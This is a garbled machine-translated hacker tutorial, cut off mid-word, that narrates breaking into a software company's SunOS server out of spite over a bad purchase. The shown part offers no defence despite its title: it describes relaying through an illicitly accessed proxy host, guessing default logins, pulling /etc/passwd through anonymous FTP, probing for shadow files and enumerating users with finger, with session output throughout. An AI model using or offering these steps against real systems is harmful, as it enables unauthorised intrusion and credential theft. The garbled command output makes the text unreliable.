Unix system attacks and Prevention

§. Preface

This article is intended for some friends who are interested in network security and are not familiar with Unix intrusion and prevention. This document describes how to effectively defend against attacks on Unix hosts.

§. Unix features

The popularity of Unix is definitely not accidental. This is inseparable from the outstanding characteristics of Unix itself, that is: 1. Strong portability; 2. Ability to start asynchronous processes; 3. Consistent file, device, and process I/O; 5. Hierarchical file system; 6. Use other shells to replace the default Shell; 7. Real multi-user and multi-task.

Note that there are two common Unix system users: root users and common users.

1. root-root User

This is a SuperUser account. You can use this account to perform all operations on this system! Obtaining root access to the system is also the ultimate goal pursued by hackers.

2. Common users

Used by the User (normal User). The specific permissions are granted to the account assigned by the root User. There can be multiple levels. Hackers often attempt to access the system from such accounts, as shown in the following example.

§. Examples of attacks on Unix systems

I first supplemented some Unix knowledge. Next we will start to test the knowledge. Our attack platform is a workstation installed with Redhat 6.0 (kernel version 2.2.5-15) (of course, you can also try it on Win9x/Win2000 !).

Disclaimer: the IP addresses of the target hosts in this article are 202.202.0.8, 202.103.10.110, and 211.50.33.117. The above IP addresses are solely fabricated by myself. It is a coincidence that the host to which the IP belongs exists.

Start!

"It's dead again! What is this bad thing? No !" I burst into the keyboard angrily. "It's also known as fully intelligent software ...... To give you an immersive experience ......, Completely put P !" I roar. When I bought the English learning software for a few days, I often crashed and spent a lot of RMB xxx, which gave me the feeling of being completely cheated. "You scammers, I have to give you some strength to see that you are still deceiving people !" I shouted angrily and copied the "swindlers" software company website www.shitsoft.com.cn on the box. No words at night.

The next day. I was busy early in the morning and didn't get idle until noon after I had eaten Chinese food. Everyone was so sleepy that I wanted to see Zhou Gong. Then I sat down next to my red hat and started the punishment of justice ......

First, find a Proxy so that it will not be caught by the reverse lookup method. ^_^ I wonder if the Korean "Rooster" is still absent? Try:

Bash # telnet 211.50.33.117

Red Hat Linux release 6.2 (Goozer)

Kernel 2.2.14-5.0 on an i686

Login: crossbow

Password:

Bash $

OK! It can also be used. It can be used even if you haven't paid attention to it for so long! South Korea's administrator is really "good! ^_^ Ping our target to see what it looks like:

Bash $ pwd

/Home/crossbow

Bash $ ping www.shitsoft.com.cn

Pinging www.shitsoft.com.cn [202.202.0.8] with 32 bytes of data:

Reply from 202.202.0.8: bytes = 32 time <10 ms TTL = 245

Reply from 202.202.0.8: bytes = 32 time <10 ms TTL = 245

Reply from 202.202.0.8: bytes = 32 time <10 ms TTL = 245

Reply from 202.202.0.8: bytes = 32 time <10 ms TTL = 245

Ping statistics for 202.202.0.8:

Packets: Sent = 4, stored ED = 4, Lost = 0 (0% loss ),

Approximate round trip times in milli-seconds:

Minimum = 0 ms, Maximum = 0 ms, Average = 0 ms

The speed is not slow. The IP address is China Education Network's machine, and the TTL is estimated to be a Unix. Verify:

Bash $ telnet 202.202.0.8

Sunoperating 5.6

Login:

It's a SunOS 5.6 rotten machine. First, let's guess:

Login: adm

Password:

Login incorrect

Login: oracle

Password:

Login incorrect

Login: ftp

Password:

Login incorrect

^ C

Hateful! Today's furious! I did not guess. :-(Use messala to scan for CGI vulnerabilities: (skip the complex scanning process )............ The result is no leakage! :-(This bird administrator is very diligent ...... You have to use nss to see what services it has launched !............ Fortunately, the telnet, ftp, and finger ports are enabled! Pai_^ first check whether there is an anonymous ftp account:

Bash $ ftp 202.202.0.8

Connected to 202.202.0.8...

220 Cool FTP server (Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.

Name (202.202.0.8: FakeName): anonymous

331 Guest login OK, send you complete e-mail address as password.

Password:

230: Welcome, archive user!

............

............

............

Ftp>

Okay. The anonymous ftp service is useless. You can use the anonymous account! Hurry and grab his passwd:

Ftp> ls

............

Bin boot etc dev home lib usr proc lost found root sbin src tmp usr var

............

Ftp> cd/etc

............

Ftp> ls * passwd *

............

Passwd-

............

Isn't it that easy? Take a look? :

Ftp> cat passwd | more

............

Root: x: 0: 1: Super-User: // sbin/sh

Daemon: x: 1: 1 ::/:

Bin: x: 2: 2:/usr/bin:

Sys: x: 3: 3 ::/:

Adm: x: 4: 4: Admin:/var/adm:

Telnet: x: 71: 8: Line Printer Admin:/usr/spool/lp:

Uucp: x: 5: 5: uucp Admin:/usr/lib/uuucp:

Nuucp: x: 9: 9: uucp Admin:/var/spool/uuucppublic:/usr/lib/uucp/uucico

Listen: x: 37: 4: Network Admin:/usr/net/nls:

Ftp: 60001: 60001: Ftp :/:

Noaccess: x: 60002: 60002: No Access User :/:

Nobody: x: 65534: 65534: SunOS 4.x Nobody :/:

Dennis: x: 1005: 20:/export/home/dennis:/bin/sh

Walter: x: 1001: 100:/export/home/walter:/bin/sh

Power: x: 9589: 101:/export/home/power:/bin/sh

Deal: x: 1035: 20:/export/home/deal:/bin/sh

Jessica: x: 3000: 300: Agent Client 1:/export/home/jessica:/bin/sh

Smith: x: 3001: 300: Agent Client 2:/export/home/smith:/bin/sh

Render: x: 9591: 101:/export/home/render:/bin/sh

............

Bad luck. It's an empty passwd! Look at the backup:

Ftp> cat passwd-| more

............

Root: x: 0: 1: Super-User: // sbin/sh

Daemon: x: 1: 1 ::/:

Bin: x: 2: 2:/usr/bin:

Sys: x: 3: 3 ::/:

Adm: x: 4: 4: Admin:/var/adm:

Telnet: x: 71: 8: Line Printer Admin:/usr/spool/lp:

Uucp: x: 5: 5: uucp Admin:/usr/lib/uuucp:

Nuucp: x: 9: 9: uucp Admin:/var/spool/uuucppublic:/usr/lib/uucp/uucico

Listen: x: 37: 4: Network Admin:/usr/net/nls:

Ftp: 60001: 60001: Ftp :/:

Noaccess: x: 60002: 60002: No Access User :/:

Nobody: x: 65534: 65534: SunOS 4.x Nobody :/:

Dennis: x: 1005: 20:/export/home/dennis:/bin/sh

Walter: x: 1001: 100:/export/home/walter:/bin/sh

Power: x: 9589: 101:/export/home/power:/bin/sh

Deal: x: 1035: 20:/export/home/deal:/bin/sh

Jessica: x: 3000: 300: Agent Client 1:/export/home/jessica:/bin/sh

Smith: x: 3001: 300: Agent Client 2:/export/home/smith:/bin/sh

Render: x: 9591: 101:/export/home/render:/bin/sh

............

No, it's the same! Check whether the shadow file exists:

Ftp> ls * shadow *

............

Shadow-

............

Haha, passwd is generally empty, so the password is in shadow!

Ftp> cat shadow | more

............

[Sh $ cat shadow | more]: Permission denied

............

You can't check the backup file. Try the backup file:

Ftp> cat shadow-| more

............

[Sh $ cat shadow-| more]: Permission denied

............

They are all the same! Faint! I had to pity that I had to catch the empty passwd. How many user names are better than none?

Ftp> get passwd

226 Transfer complete.

540 bytes encoded ed in 0.55 seconds (1.8 Kbytes/s)

Ftp> bye

221 Goodbye.

Bash $

After studying, apart from the root account and the Disabled Account, there are also seven available accounts: dennis, walter, power, deal, jessica, smith, and render. They are our final hope to enter the host. Pai_^ finger!

Bash $ finger @ 202.202.0.8

[202.202.0.8]

LoginNameTTYIdleWhenWhere

Daemon ??? <...>

Bin ??? <...>

Sys ??? <...>

WalterWalter Wan pts/0202.202.0.114

DennisDennis Lee437 888wnet.net

Power Power xion0000202.202.0.10

DealH Wang pts/2202.202.0.11

Admin ??? <...>

JessicaJessica Xiaopts/0202.202.0.9

SmithSmi